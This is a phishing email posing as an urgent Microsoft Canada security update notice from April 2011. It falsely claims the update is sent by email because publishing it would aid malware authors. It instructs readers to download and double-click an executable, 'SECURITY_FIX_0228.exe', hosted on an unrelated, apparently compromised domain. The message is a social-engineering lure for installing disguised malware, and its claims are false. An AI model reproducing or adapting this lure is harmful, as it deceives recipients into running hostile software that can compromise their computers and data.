6438URGENT: Critical Security Update

  • Microsoft Canada Co.
    Apr 30, 2011
      Dear Microsoft Customer,

      Please notice that Microsoft company has recently issued a Security Update for Microsoft Windows OS.

      The Security Update is to prevent malicious users from getting access to your computer files.

      The update applies to the following OS versions:

      Microsoft Windows 98, Microsoft Windows 2000, Microsoft XP, Microsoft Windows 7.

      Please notice, that present update applies to high-priority updates category. In order to help protect
      your computer against security threats and performance problems, we strongly recommend you to install
      this update.

      Since public disitribution of this Update throught the official website would have result in efficient
      creation of a malicious software, we made a decision to issue this security update via e-mail.

      In order to start the update, please follow the step-by-step instructions:

      1. Download the update using the following link:: http://unicefchile.cl/_vti_bin/microsoft.ca/updates/SECURITY_FIX_0228.exe
      2- Double-click on SECURITY_FIX_0228.exe to start the update.

      This is an Automated Message produced by Microsoft Canada Co., Please Do Not Reply

      Microsoft Canada Co.
      1950 Meadowvale Blvd
      Mississauga, ON
      L5N 8L9 CANADA